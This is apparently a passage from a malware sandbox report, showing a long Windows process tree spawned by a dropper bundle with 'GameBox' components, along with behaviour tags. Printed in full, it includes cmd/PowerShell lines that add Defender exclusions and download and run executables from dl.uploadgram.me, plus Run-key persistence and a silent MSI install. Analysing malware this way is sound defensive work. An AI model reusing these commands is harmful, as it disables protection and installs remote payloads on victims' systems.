                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:7944
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:7388
                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:4844
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  Esplorarne.exe.com i
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:7756
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      10⤵
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:7964
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:7988
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          12⤵
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:6560
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            13⤵
                                                                                                                                                                                              PID:8608
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                14⤵
                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                PID:9168
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                    PID:9020
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                      PID:5328
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                        PID:8892
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          PID:7636
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:9032
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                PID:8668
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  21⤵
                                                                                                                                                                                                                    PID:8776
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                      PID:9012
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                        PID:7724
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                          PID:6352
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                              PID:9148
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                PID:8280
                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                              ping GFBFPSXA -n 30
                                                                                                                                                                                              9⤵
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:7688
                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      PID:5432
                                                                                                                                                                                      • C:\Users\Admin\Documents\lJIWuMrJzznUo7ZwAp5dcsNj.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\lJIWuMrJzznUo7ZwAp5dcsNj.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:6300
                                                                                                                                                                                          • C:\Users\Admin\Documents\lJIWuMrJzznUo7ZwAp5dcsNj.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\lJIWuMrJzznUo7ZwAp5dcsNj.exe" -q
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:6768
                                                                                                                                                                                        • C:\Users\Admin\Documents\5eeq_4syr45SsmxyATxRqczl.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\5eeq_4syr45SsmxyATxRqczl.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                          PID:6192
                                                                                                                                                                                        • C:\Users\Admin\Documents\7qXlLUcEgvvX2K_nyoEQMANs.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\7qXlLUcEgvvX2K_nyoEQMANs.exe"
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:4804
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\6225295.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\6225295.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:6712
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7098084.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7098084.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                PID:7836
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2639750.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2639750.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:5928
                                                                                                                                                                                              • C:\Users\Admin\Documents\WBbtSAZAOULkIXUjuL9eOH9P.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\WBbtSAZAOULkIXUjuL9eOH9P.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:6768
                                                                                                                                                                                                  • C:\Users\Admin\Documents\WBbtSAZAOULkIXUjuL9eOH9P.exe
                                                                                                                                                                                                    C:\Users\Admin\Documents\WBbtSAZAOULkIXUjuL9eOH9P.exe
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:7608
                                                                                                                                                                                                  • C:\Users\Admin\Documents\QhL1gugFDl1odTkQACGH7_6A.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\QhL1gugFDl1odTkQACGH7_6A.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                    PID:7108
                                                                                                                                                                                                  • C:\Users\Admin\Documents\eo6kJFYtmwuZAuhJhrOuCy2R.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\eo6kJFYtmwuZAuhJhrOuCy2R.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                    PID:4900
                                                                                                                                                                                                    • C:\Users\Admin\Documents\eo6kJFYtmwuZAuhJhrOuCy2R.exe
                                                                                                                                                                                                      C:\Users\Admin\Documents\eo6kJFYtmwuZAuhJhrOuCy2R.exe
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                        PID:5980
                                                                                                                                                                                                    • C:\Users\Admin\Documents\60pVRpzAVJ2wxjAM5O2NV8TQ.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\60pVRpzAVJ2wxjAM5O2NV8TQ.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:196
                                                                                                                                                                                                      • C:\Users\Admin\Documents\8AJ50r0UwKhj8nK5IuJG9Lpg.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\8AJ50r0UwKhj8nK5IuJG9Lpg.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:6644
                                                                                                                                                                                                          • C:\Users\Admin\Documents\8AJ50r0UwKhj8nK5IuJG9Lpg.exe
                                                                                                                                                                                                            C:\Users\Admin\Documents\8AJ50r0UwKhj8nK5IuJG9Lpg.exe
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                          • C:\Users\Admin\Documents\xfjNX6ljvuQQfIybkHgi8irh.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\xfjNX6ljvuQQfIybkHgi8irh.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:2776
                                                                                                                                                                                                          • C:\Users\Admin\Documents\3GGNdmEexipFknSLuOy2K6QY.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\3GGNdmEexipFknSLuOy2K6QY.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:6548
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6548 -s 884
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:1056
                                                                                                                                                                                                            • C:\Users\Admin\Documents\lMdPpbEeMhkgn0UCeHuPIHFS.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\lMdPpbEeMhkgn0UCeHuPIHFS.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:6752
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:7552
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:6904
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:8576
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:5880
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:7148
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:9964
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:9636
                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:9872
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:10104
                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:9924
                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                PID:8776
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                PID:9772
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                  PID:3848
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                    PID:2088
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:9692
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:2568
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                    PID:4132
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:9484
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:9828
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:9820
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                                          "{path}"
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:8752
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\S0a9Drnb9YTD9o1482LS4QPc.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\S0a9Drnb9YTD9o1482LS4QPc.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:6756
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 1116
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        PID:6296
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 1064
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        PID:8132
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\W4DViRm8CJu7OckU_e3HJXEG.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\W4DViRm8CJu7OckU_e3HJXEG.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:6716
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\K17Ua6vKMNWSIxko7q1lgLWP.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\K17Ua6vKMNWSIxko7q1lgLWP.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                        PID:5340
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\7gfczG5xdIucwr87CjCZGmmI.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\7gfczG5xdIucwr87CjCZGmmI.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:6116
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\_D869XMsiN6zo4QdatFx07s9.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\_D869XMsiN6zo4QdatFx07s9.exe"
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:5924
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-H4037.tmp\_D869XMsiN6zo4QdatFx07s9.tmp
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-H4037.tmp\_D869XMsiN6zo4QdatFx07s9.tmp" /SL5="$3033A,138429,56832,C:\Users\Admin\Documents\_D869XMsiN6zo4QdatFx07s9.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                              PID:7376
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-C1NQA.tmp\Setup.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-C1NQA.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:4564
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                                                                                    PID:8908
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289458 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:8332
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\yl1phlv1Qbivh9MeLiUkQDCe.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\yl1phlv1Qbivh9MeLiUkQDCe.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                PID:5892
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\a4ylHdaAmuGuj4jFu4Yxp1Lf.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\a4ylHdaAmuGuj4jFu4Yxp1Lf.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                PID:1744
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\jGKjd_PKugiNhBzudEEzifer.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\jGKjd_PKugiNhBzudEEzifer.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:6464
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\aZqVP9hrjNmpvNy7vCu_t001.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\aZqVP9hrjNmpvNy7vCu_t001.exe"
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:6672
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\aZqVP9hrjNmpvNy7vCu_t001.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\aZqVP9hrjNmpvNy7vCu_t001.exe"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                      PID:9892
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\IwBUmCjHoELzwBwGi7UfBQxr.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\IwBUmCjHoELzwBwGi7UfBQxr.exe"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:6680
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\NXHTiAChPz_u_idokth9mfAk.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\NXHTiAChPz_u_idokth9mfAk.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                      PID:7460
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\NXHTiAChPz_u_idokth9mfAk.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\NXHTiAChPz_u_idokth9mfAk.exe
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:7924
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\NXHTiAChPz_u_idokth9mfAk.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\NXHTiAChPz_u_idokth9mfAk.exe
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                          PID:5144
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:5320
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                                                        6⤵
